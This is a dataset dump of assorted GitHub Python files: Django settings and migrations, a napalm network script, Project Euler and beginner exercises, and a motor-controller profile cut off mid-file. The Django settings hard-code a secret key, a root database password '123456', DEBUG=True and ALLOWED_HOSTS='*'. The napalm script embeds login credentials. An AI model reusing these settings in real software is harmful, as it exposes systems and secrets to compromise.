Dataset schema (one record per source file; each record below lists these fields in order, pipe-separated, with `content` inlined):

| # | column | dtype | stats |
|---|---|---|---|
| 1 | blob_id | string | length 40–40 |
| 2 | directory_id | string | length 40–40 |
| 3 | path | string | length 3–281 |
| 4 | content_id | string | length 40–40 |
| 5 | detected_licenses | list | length 0–57 |
| 6 | license_type | string | 2 classes |
| 7 | repo_name | string | length 6–116 |
| 8 | snapshot_id | string | length 40–40 |
| 9 | revision_id | string | length 40–40 |
| 10 | branch_name | string | 313 classes |
| 11 | visit_date | timestamp[us] | |
| 12 | revision_date | timestamp[us] | |
| 13 | committer_date | timestamp[us] | |
| 14 | github_id | int64 | 18.2k–668M, nullable |
| 15 | star_events_count | int64 | 0–102k |
| 16 | fork_events_count | int64 | 0–38.2k |
| 17 | gha_license_id | string | 17 classes |
| 18 | gha_event_created_at | timestamp[us] | |
| 19 | gha_created_at | timestamp[us] | |
| 20 | gha_language | string | 107 classes |
| 21 | src_encoding | string | 20 classes |
| 22 | language | string | 1 class |
| 23 | is_vendor | bool | 2 classes |
| 24 | is_generated | bool | 2 classes |
| 25 | length_bytes | int64 | 4–6.02M |
| 26 | extension | string | 78 classes |
| 27 | content | string | length 2–6.02M |
| 28 | authors | list | length 1–1 |
| 29 | author | string | length 0–175 |
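For anyone reproducing this preview, the sketch below shows one way a dump with this schema could be streamed and inspected. The dataset name and `data_dir` are placeholder assumptions (this dump does not say where it is hosted); the `datasets` library calls themselves are standard.

```python
# Minimal sketch: stream and inspect records with the schema above.
# "bigcode/the-stack" and data_dir are assumptions, not stated in this dump.
from datasets import load_dataset

ds = load_dataset("bigcode/the-stack", data_dir="data/python",
                  split="train", streaming=True)  # stream to avoid a full download
for record in ds.take(1):
    print(record["repo_name"], record["path"], record["length_bytes"])
```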
ec50df0aa2a320ce0f88bb7eea72f3ddae60e3a7 | 476768e5629340efcbc11fd175c7db12e09c2d52 | /python/006.py | be26addbbddf5f50f6e7fff97a4484130aab1bf1 | []
| no_license | zero1hac/projecteuler | fb8ded5de8d4126865c11081e4b407e0ae35e304 | 7dc00e89c9870d5c7d9c6364f1e80e19d69655e5 | refs/heads/master | 2020-04-23T20:10:51.375485 | 2019-03-25T08:38:59 | 2019-03-25T08:38:59 | 171,430,763 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | if __name__ == "__main__":
    n = 100
    # closed-form identities for the sum of squares and the square of the sum
    sum_of_squares = n * (n + 1) * (2 * n + 1) // 6
    square_of_sum = (n * (n + 1) // 2) ** 2
    print(square_of_sum - sum_of_squares)  # was a Python 2 print statement | [
"[email protected]"
]
| |
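The record above relies on two closed-form identities (sum of the first n squares, and the square of the sum of the first n integers). A brute-force check of both, added here for illustration and not part of the original file:

```python
# Verify the closed forms used in 006.py above (illustrative addition).
n = 100
sum_of_squares = sum(i * i for i in range(1, n + 1))
square_of_sum = sum(range(1, n + 1)) ** 2
assert sum_of_squares == n * (n + 1) * (2 * n + 1) // 6
assert square_of_sum == (n * (n + 1) // 2) ** 2
print(square_of_sum - sum_of_squares)  # 25164150 for n = 100
```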
86d86d506dc4ea99908834b2219f9ecceb083da6 | ad2219bca2bb88604e6dc4b3625b5872f1ae4eff | /Notepad/settings.py | 5605a2d47eb6aae23e97682217dae909223b29f3 | []
| no_license | Abdul-Afeez/notepad | 20c6d25f73812740c6709e52f3a638ac9c8d84fe | 0acfd2961bb29a11e2f97cfeb178e14e18d5a5e3 | refs/heads/master | 2023-08-16T06:08:15.387908 | 2021-09-23T06:20:30 | 2021-09-23T06:20:30 | 408,530,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,095 | py | """
Django settings for Notepad project.
Generated by 'django-admin startproject' using Django 2.2.24.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i(4*c%rg4$9ce*&g-fb&7(!7^aef$%=3^x3hi@(-sfkwep57f+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_simplejwt.authentication.JWTAuthentication',
)
}
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'django_mysql',
'rest_framework',
'rest_framework_simplejwt',
'Notepad.owners',
'Notepad.notes',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Notepad.urls'
CORS_ORIGIN_WHITELIST = (
'http://0.0.0.0:3000',
'http://localhost:3000',
'http://localhost:8000',
'http://18.118.112.37',
'http://18.118.112.37:8000'
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Notepad.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': '../mysql/my.cnf',
'charset': 'utf8mb4',
},
# Tell Django to build the test database with the 'utf8mb4' character set
'TEST': {
'CHARSET': 'utf8mb4',
'COLLATION': 'utf8mb4_unicode_ci',
},
'NAME': 'note',
'USER': 'root',
'PASSWORD': '123456',
'HOST': 'note_db',
'PORT': 3306,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'owners.Owner'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
SESSION_TIMEOUT = 60
| [
"[email protected]"
]
| |
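One hazard in the settings record above is the hard-coded `SECRET_KEY` and database password. A common mitigation, sketched here as a suggestion rather than as part of the original file (the environment-variable names are assumptions), is to read them from the environment:

```python
# Sketch: environment-based secrets for the settings.py above.
# DJANGO_SECRET_KEY / NOTE_DB_PASSWORD are assumed variable names.
import os

SECRET_KEY = os.environ.get("DJANGO_SECRET_KEY", "dev-only-insecure-key")
DB_PASSWORD = os.environ.get("NOTE_DB_PASSWORD", "")  # replaces the literal '123456'
```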
4a1bb31236fc9773fb0e6894d55116aa1e9934d8 | 3eeedc6a5a9d31c5fff5d06ef2c659147ae27fec | /users/migrations/0025_auto_20190705_2137.py | 964d4ad9e73d3a9c5f127b9ccbc37afb649ad016 | []
| no_license | aahmedsamy/special_offer | 2ef284e7a9a759f79e150adfd7c18625ec4c1b8c | 384efad727f80aa4d9452485c3b5899abc3d39cb | refs/heads/master | 2022-03-08T22:42:07.040004 | 2019-07-21T20:57:55 | 2019-07-21T20:57:55 | 181,128,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | # Generated by Django 2.2 on 2019-07-05 17:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0024_auto_20190705_2112'),
]
operations = [
migrations.AlterModelOptions(
name='advertisernotification',
options={'ordering': ['-id'], 'verbose_name': 'AdvertiserNotification', 'verbose_name_plural': 'AdvertiserNotifications'},
),
]
| [
"[email protected]"
]
| |
fbc3cb3337489cd49a68c2578139f993cb3822c4 | a0083584308a52b045550dbe76007e2467b7e40f | /pythonvideos/napalm_mac_Address.py | f7338f62e722e668b8d2dd285552ab03e44f5a7b | []
| no_license | narkalya/git-demo | ac511391a2c8026d53215262202b924a220ded0b | abffcdf9e0d1afd15742bfdd45784423eb04d4ab | refs/heads/master | 2020-03-25T08:58:49.356341 | 2018-08-06T15:09:25 | 2018-08-06T15:09:25 | 143,641,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | from napalm import get_network_driver
import json  # required by json.dumps below; missing from the original file

driver = get_network_driver('ios')
iosvl2 = driver('192.168.122.72', 'david', 'cisco')
iosvl2.open()
print(iosvl2.get_facts())
ios_output = iosvl2.get_mac_address_table()
print(json.dumps(ios_output, sort_keys=True, indent=4))
iosvl2.close()
| [
"[email protected]"
]
| |
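A slightly safer variant of the napalm snippet above uses the driver as a context manager, so the session is closed even if a getter raises. This assumes a napalm release whose drivers implement the `with` protocol (recent ones do):

```python
# Context-managed variant of the napalm session above (sketch).
import json
from napalm import get_network_driver

driver = get_network_driver('ios')
with driver('192.168.122.72', 'david', 'cisco') as device:  # opens and closes the session
    print(json.dumps(device.get_mac_address_table(), sort_keys=True, indent=4))
```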
838994d7fee7f1ec6d0ab6addde154ea89e34fc1 | df1ad0d061f7982edd0d5e159a1abc31daa8fd4c | /MapApp/migrations/0004_registerview.py | f535de1806e149f392a7e4d785b7132cf36a7735 | [
"Apache-2.0"
]
| permissive | todor943/mapEngine | f6c056ca1b2fcf6207d5a1bf2b5908f062fff353 | 560c4e9bee2ef20e988124030db801337d8722f1 | refs/heads/master | 2020-12-24T18:55:13.667780 | 2017-11-06T19:54:04 | 2017-11-06T19:54:04 | 57,469,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,065 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 22:32
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
import django.views.generic.base
class Migration(migrations.Migration):
dependencies = [
('auth', '0008_alter_user_username_max_length'),
('MapApp', '0003_auto_20171002_1846'),
]
operations = [
migrations.CreateModel(
name='RegisterView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
bases=(models.Model, django.views.generic.base.View),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"[email protected]"
]
| |
6ac793e3b8df59989fc5a148e4385b6fe3b6ed70 | dbab24ee5055dad1a57bb212ae30da994022eab5 | /Python/Chapter 6 - tehtävä 3.py | 4703757b6f12df00e86114119c5ffd8b7220709e | []
| no_license | MikBom/mikbom-github.io | e8ab24080a6c6383f4ad973a817e10ab84375e4f | 3dc7312798473a7620529d24fa771d5b09bafbbc | refs/heads/main | 2023-08-14T07:04:01.427822 | 2021-09-21T16:08:32 | 2021-09-21T16:08:32 | 301,965,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | vari = input("Choose an option (1-3):")  # prompt translated from Finnish: "Valitse kohde (1-3):"
if vari == "1":
    print("Haukion Kala Oy")
elif vari == "2":
    print("Metallipaja VasaraAika")
elif vari == "3":
    print("Balin palapelitehdas") | [
"[email protected]"
]
| |
e3de38465362031a14aa2ff4b827877b72f76780 | 60de13f814ebfff48740b693563bf4b83096534d | /venv/Scripts/pip-script.py | ee13259c85c9b690ddae6a5c5196f921bda9b1ed | []
| no_license | Daria8402/bandurova17ov1 | 1c568d41b64fa3c1093193fb78b6c5c15a569cd7 | 5b202d32a4b2707664615b7d9d98f4c77efa9622 | refs/heads/master | 2021-02-18T12:12:56.944287 | 2020-03-05T15:43:51 | 2020-03-05T15:43:51 | 245,193,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #!D:\GitHub\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"[email protected]"
]
| |
547125bf7f5eb3fd28b9773a2c0f621cc581f51f | 5087f23a7d11be7580b6f0e3d8bc434ff0451c05 | /lambda.py | 09b30ea8d1db850cf24c3624943f654d851a2c87 | [
"MIT"
]
| permissive | ShanmukhaSrinivas/python-75-hackathon | b07c35fea469c8fbc8769d02d3bb63d6af93cafc | 57eafed31d84ac09079ba9bcbaa9263d79996313 | refs/heads/master | 2020-04-11T10:51:15.137518 | 2019-12-13T07:55:52 | 2019-12-13T07:55:52 | 161,728,454 | 0 | 0 | MIT | 2018-12-14T03:47:44 | 2018-12-14T03:47:44 | null | UTF-8 | Python | false | false | 146 | py | # lambda function that tests whether a number is even or odd
f = lambda x: 'Even' if x % 2 == 0 else 'Odd'
print(f(int(input('Enter a number \n')))) | [
"[email protected]"
]
| |
f1c36c2f5193255fecfcd93b9edf3e5806fbce99 | b6639af28745c7cee140b4d76332c937557df0dd | /python/lab3.1.py | 6163a99e1effe76fb1ae315e913cedbbb33a0dc5 | []
| no_license | ston1x/uni | a9ef682115ef50994012a887a1a62ec0d8dc90ee | 8062f9f1d0beeddabe74cbbf672ca68d7ac626ec | refs/heads/master | 2020-09-22T02:35:04.927509 | 2020-02-24T07:14:14 | 2020-02-24T07:14:14 | 225,019,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | def string_to_words(string, separator):
    try:
        return string.split(separator)
    except Exception as e:
        print(e)

try:
    string = input("Enter the string divided by a separator: ")
    separator = input("Enter the separator character by which the string will be split: ")
except Exception as e:
    print(e)
else:
    # only split when both inputs were read successfully
    words = string_to_words(string, separator)
    print(words)
| [
"[email protected]"
]
| |
ef82571b3a9d413818632a92cb1e3edb2d75dab3 | 385a63d3c9e6f5815979165001f78ec3d7b90cd2 | /DrivingTDM_SetupMatlabOOP/headerAndFunctionsMotor/ximc/python-profiles/STANDA/8MT195X-540-4.py | 391e7db3d811458155873424999b6ceb86b43093 | [
"BSD-2-Clause"
]
| permissive | Rasedujjaman/matlabOOP | 5abb6ec94998fda5e9214ed94cf67a42bf243d4f | e1f025ab9b00a3646719df23852079736d2b5701 | refs/heads/main | 2023-07-23T21:40:53.905045 | 2021-08-31T16:12:39 | 2021-08-31T16:12:39 | 378,249,559 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22,654 | py | def set_profile_8MT195X_540_4(lib, id):
worst_result = Result.Ok
result = Result.Ok
feedback_settings = feedback_settings_t()
feedback_settings.IPS = 4000
class FeedbackType_:
FEEDBACK_ENCODER_MEDIATED = 6
FEEDBACK_NONE = 5
FEEDBACK_EMF = 4
FEEDBACK_ENCODER = 1
feedback_settings.FeedbackType = FeedbackType_.FEEDBACK_EMF
class FeedbackFlags_:
FEEDBACK_ENC_TYPE_BITS = 192
FEEDBACK_ENC_TYPE_DIFFERENTIAL = 128
FEEDBACK_ENC_TYPE_SINGLE_ENDED = 64
FEEDBACK_ENC_REVERSE = 1
FEEDBACK_ENC_TYPE_AUTO = 0
feedback_settings.FeedbackFlags = FeedbackFlags_.FEEDBACK_ENC_TYPE_SINGLE_ENDED | FeedbackFlags_.FEEDBACK_ENC_TYPE_AUTO
feedback_settings.CountsPerTurn = 4000
result = lib.set_feedback_settings(id, byref(feedback_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
home_settings = home_settings_t()
home_settings.FastHome = 500
home_settings.uFastHome = 0
home_settings.SlowHome = 500
home_settings.uSlowHome = 0
home_settings.HomeDelta = 500
home_settings.uHomeDelta = 0
class HomeFlags_:
HOME_USE_FAST = 256
HOME_STOP_SECOND_BITS = 192
HOME_STOP_SECOND_LIM = 192
HOME_STOP_SECOND_SYN = 128
HOME_STOP_SECOND_REV = 64
HOME_STOP_FIRST_BITS = 48
HOME_STOP_FIRST_LIM = 48
HOME_STOP_FIRST_SYN = 32
HOME_STOP_FIRST_REV = 16
HOME_HALF_MV = 8
HOME_MV_SEC_EN = 4
HOME_DIR_SECOND = 2
HOME_DIR_FIRST = 1
home_settings.HomeFlags = HomeFlags_.HOME_USE_FAST | HomeFlags_.HOME_STOP_SECOND_REV | HomeFlags_.HOME_STOP_FIRST_BITS | HomeFlags_.HOME_DIR_SECOND
result = lib.set_home_settings(id, byref(home_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
move_settings = move_settings_t()
move_settings.Speed = 1000
move_settings.uSpeed = 0
move_settings.Accel = 2000
move_settings.Decel = 4000
move_settings.AntiplaySpeed = 1000
move_settings.uAntiplaySpeed = 0
class MoveFlags_:
RPM_DIV_1000 = 1
result = lib.set_move_settings(id, byref(move_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
engine_settings = engine_settings_t()
engine_settings.NomVoltage = 1
engine_settings.NomCurrent = 2100
engine_settings.NomSpeed = 2000
engine_settings.uNomSpeed = 0
class EngineFlags_:
ENGINE_LIMIT_RPM = 128
ENGINE_LIMIT_CURR = 64
ENGINE_LIMIT_VOLT = 32
ENGINE_ACCEL_ON = 16
ENGINE_ANTIPLAY = 8
ENGINE_MAX_SPEED = 4
ENGINE_CURRENT_AS_RMS = 2
ENGINE_REVERSE = 1
engine_settings.EngineFlags = EngineFlags_.ENGINE_LIMIT_RPM | EngineFlags_.ENGINE_ACCEL_ON | EngineFlags_.ENGINE_REVERSE
engine_settings.Antiplay = 575
class MicrostepMode_:
MICROSTEP_MODE_FRAC_256 = 9
MICROSTEP_MODE_FRAC_128 = 8
MICROSTEP_MODE_FRAC_64 = 7
MICROSTEP_MODE_FRAC_32 = 6
MICROSTEP_MODE_FRAC_16 = 5
MICROSTEP_MODE_FRAC_8 = 4
MICROSTEP_MODE_FRAC_4 = 3
MICROSTEP_MODE_FRAC_2 = 2
MICROSTEP_MODE_FULL = 1
engine_settings.MicrostepMode = MicrostepMode_.MICROSTEP_MODE_FRAC_256
engine_settings.StepsPerRev = 200
result = lib.set_engine_settings(id, byref(engine_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
entype_settings = entype_settings_t()
class EngineType_:
ENGINE_TYPE_BRUSHLESS = 5
ENGINE_TYPE_TEST = 4
ENGINE_TYPE_STEP = 3
ENGINE_TYPE_2DC = 2
ENGINE_TYPE_DC = 1
ENGINE_TYPE_NONE = 0
entype_settings.EngineType = EngineType_.ENGINE_TYPE_STEP | EngineType_.ENGINE_TYPE_NONE
class DriverType_:
DRIVER_TYPE_EXTERNAL = 3
DRIVER_TYPE_INTEGRATE = 2
DRIVER_TYPE_DISCRETE_FET = 1
entype_settings.DriverType = DriverType_.DRIVER_TYPE_INTEGRATE
result = lib.set_entype_settings(id, byref(entype_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
power_settings = power_settings_t()
power_settings.HoldCurrent = 50
power_settings.CurrReductDelay = 1000
power_settings.PowerOffDelay = 60
power_settings.CurrentSetTime = 300
class PowerFlags_:
POWER_SMOOTH_CURRENT = 4
POWER_OFF_ENABLED = 2
POWER_REDUCT_ENABLED = 1
power_settings.PowerFlags = PowerFlags_.POWER_SMOOTH_CURRENT | PowerFlags_.POWER_OFF_ENABLED | PowerFlags_.POWER_REDUCT_ENABLED
result = lib.set_power_settings(id, byref(power_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
secure_settings = secure_settings_t()
secure_settings.LowUpwrOff = 800
secure_settings.CriticalIpwr = 4000
secure_settings.CriticalUpwr = 5500
secure_settings.CriticalT = 800
secure_settings.CriticalIusb = 450
secure_settings.CriticalUusb = 520
secure_settings.MinimumUusb = 420
class Flags_:
ALARM_ENGINE_RESPONSE = 128
ALARM_WINDING_MISMATCH = 64
USB_BREAK_RECONNECT = 32
ALARM_FLAGS_STICKING = 16
ALARM_ON_BORDERS_SWAP_MISSET = 8
H_BRIDGE_ALERT = 4
LOW_UPWR_PROTECTION = 2
ALARM_ON_DRIVER_OVERHEATING = 1
secure_settings.Flags = Flags_.ALARM_ENGINE_RESPONSE | Flags_.ALARM_FLAGS_STICKING | Flags_.ALARM_ON_BORDERS_SWAP_MISSET | Flags_.H_BRIDGE_ALERT | Flags_.ALARM_ON_DRIVER_OVERHEATING
result = lib.set_secure_settings(id, byref(secure_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
edges_settings = edges_settings_t()
class BorderFlags_:
BORDERS_SWAP_MISSET_DETECTION = 8
BORDER_STOP_RIGHT = 4
BORDER_STOP_LEFT = 2
BORDER_IS_ENCODER = 1
edges_settings.BorderFlags = BorderFlags_.BORDER_STOP_RIGHT | BorderFlags_.BORDER_STOP_LEFT
class EnderFlags_:
ENDER_SW2_ACTIVE_LOW = 4
ENDER_SW1_ACTIVE_LOW = 2
ENDER_SWAP = 1
edges_settings.EnderFlags = EnderFlags_.ENDER_SWAP
edges_settings.LeftBorder = 175
edges_settings.uLeftBorder = 0
edges_settings.RightBorder = 25825
edges_settings.uRightBorder = 0
result = lib.set_edges_settings(id, byref(edges_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
pid_settings = pid_settings_t()
pid_settings.KpU = 0
pid_settings.KiU = 0
pid_settings.KdU = 0
pid_settings.Kpf = 0.003599999938160181
pid_settings.Kif = 0.03799999877810478
pid_settings.Kdf = 2.8000000384054147e-05
result = lib.set_pid_settings(id, byref(pid_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
sync_in_settings = sync_in_settings_t()
class SyncInFlags_:
SYNCIN_GOTOPOSITION = 4
SYNCIN_INVERT = 2
SYNCIN_ENABLED = 1
sync_in_settings.ClutterTime = 4
sync_in_settings.Position = 0
sync_in_settings.uPosition = 0
sync_in_settings.Speed = 0
sync_in_settings.uSpeed = 0
result = lib.set_sync_in_settings(id, byref(sync_in_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
sync_out_settings = sync_out_settings_t()
class SyncOutFlags_:
SYNCOUT_ONPERIOD = 64
SYNCOUT_ONSTOP = 32
SYNCOUT_ONSTART = 16
SYNCOUT_IN_STEPS = 8
SYNCOUT_INVERT = 4
SYNCOUT_STATE = 2
SYNCOUT_ENABLED = 1
sync_out_settings.SyncOutFlags = SyncOutFlags_.SYNCOUT_ONSTOP | SyncOutFlags_.SYNCOUT_ONSTART
sync_out_settings.SyncOutPulseSteps = 100
sync_out_settings.SyncOutPeriod = 2000
sync_out_settings.Accuracy = 0
sync_out_settings.uAccuracy = 0
result = lib.set_sync_out_settings(id, byref(sync_out_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
extio_settings = extio_settings_t()
class EXTIOSetupFlags_:
EXTIO_SETUP_INVERT = 2
EXTIO_SETUP_OUTPUT = 1
extio_settings.EXTIOSetupFlags = EXTIOSetupFlags_.EXTIO_SETUP_OUTPUT
class EXTIOModeFlags_:
EXTIO_SETUP_MODE_OUT_BITS = 240
EXTIO_SETUP_MODE_OUT_MOTOR_ON = 64
EXTIO_SETUP_MODE_OUT_ALARM = 48
EXTIO_SETUP_MODE_OUT_MOVING = 32
EXTIO_SETUP_MODE_OUT_ON = 16
EXTIO_SETUP_MODE_IN_BITS = 15
EXTIO_SETUP_MODE_IN_ALARM = 5
EXTIO_SETUP_MODE_IN_HOME = 4
EXTIO_SETUP_MODE_IN_MOVR = 3
EXTIO_SETUP_MODE_IN_PWOF = 2
EXTIO_SETUP_MODE_IN_STOP = 1
EXTIO_SETUP_MODE_IN_NOP = 0
EXTIO_SETUP_MODE_OUT_OFF = 0
extio_settings.EXTIOModeFlags = EXTIOModeFlags_.EXTIO_SETUP_MODE_IN_STOP | EXTIOModeFlags_.EXTIO_SETUP_MODE_IN_NOP | EXTIOModeFlags_.EXTIO_SETUP_MODE_OUT_OFF
result = lib.set_extio_settings(id, byref(extio_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
brake_settings = brake_settings_t()
brake_settings.t1 = 300
brake_settings.t2 = 500
brake_settings.t3 = 300
brake_settings.t4 = 400
class BrakeFlags_:
BRAKE_ENG_PWROFF = 2
BRAKE_ENABLED = 1
brake_settings.BrakeFlags = BrakeFlags_.BRAKE_ENG_PWROFF
result = lib.set_brake_settings(id, byref(brake_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
control_settings = control_settings_t()
control_settings.MaxSpeed[0] = 100
control_settings.MaxSpeed[1] = 1000
control_settings.MaxSpeed[2] = 0
control_settings.MaxSpeed[3] = 0
control_settings.MaxSpeed[4] = 0
control_settings.MaxSpeed[5] = 0
control_settings.MaxSpeed[6] = 0
control_settings.MaxSpeed[7] = 0
control_settings.MaxSpeed[8] = 0
control_settings.MaxSpeed[9] = 0
control_settings.uMaxSpeed[0] = 0
control_settings.uMaxSpeed[1] = 0
control_settings.uMaxSpeed[2] = 0
control_settings.uMaxSpeed[3] = 0
control_settings.uMaxSpeed[4] = 0
control_settings.uMaxSpeed[5] = 0
control_settings.uMaxSpeed[6] = 0
control_settings.uMaxSpeed[7] = 0
control_settings.uMaxSpeed[8] = 0
control_settings.uMaxSpeed[9] = 0
control_settings.Timeout[0] = 1000
control_settings.Timeout[1] = 1000
control_settings.Timeout[2] = 1000
control_settings.Timeout[3] = 1000
control_settings.Timeout[4] = 1000
control_settings.Timeout[5] = 1000
control_settings.Timeout[6] = 1000
control_settings.Timeout[7] = 1000
control_settings.Timeout[8] = 1000
control_settings.MaxClickTime = 300
class Flags_:
CONTROL_BTN_RIGHT_PUSHED_OPEN = 8
CONTROL_BTN_LEFT_PUSHED_OPEN = 4
CONTROL_MODE_BITS = 3
CONTROL_MODE_LR = 2
CONTROL_MODE_JOY = 1
CONTROL_MODE_OFF = 0
control_settings.Flags = Flags_.CONTROL_MODE_LR | Flags_.CONTROL_MODE_OFF
control_settings.DeltaPosition = 1
control_settings.uDeltaPosition = 0
result = lib.set_control_settings(id, byref(control_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
joystick_settings = joystick_settings_t()
joystick_settings.JoyLowEnd = 0
joystick_settings.JoyCenter = 5000
joystick_settings.JoyHighEnd = 10000
joystick_settings.ExpFactor = 100
joystick_settings.DeadZone = 50
class JoyFlags_:
JOY_REVERSE = 1
result = lib.set_joystick_settings(id, byref(joystick_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
ctp_settings = ctp_settings_t()
ctp_settings.CTPMinError = 3
class CTPFlags_:
CTP_ERROR_CORRECTION = 16
REV_SENS_INV = 8
CTP_ALARM_ON_ERROR = 4
CTP_BASE = 2
CTP_ENABLED = 1
ctp_settings.CTPFlags = CTPFlags_.CTP_ERROR_CORRECTION
result = lib.set_ctp_settings(id, byref(ctp_settings))
if result != Result.Ok:
if worst_result == Result.Ok or worst_result == Result.ValueError:
worst_result = result
uart_settings = uart_settings_t()
uart_settings.Speed = 115200
class UARTSetupFlags_:
UART_STOP_BIT = 8
UART_PARITY_BIT_USE = 4
UART_PARITY_BITS = 3
UART_PARITY_BIT_MARK = 3
UART_PARITY_BIT_SPACE = 2
UART_PARITY_BIT_ODD = 1
UART_PARITY_BIT_EVEN = 0
uart_settings.UARTSetupFlags = UARTSetupFlags_.UART_PARITY_BIT_EVEN
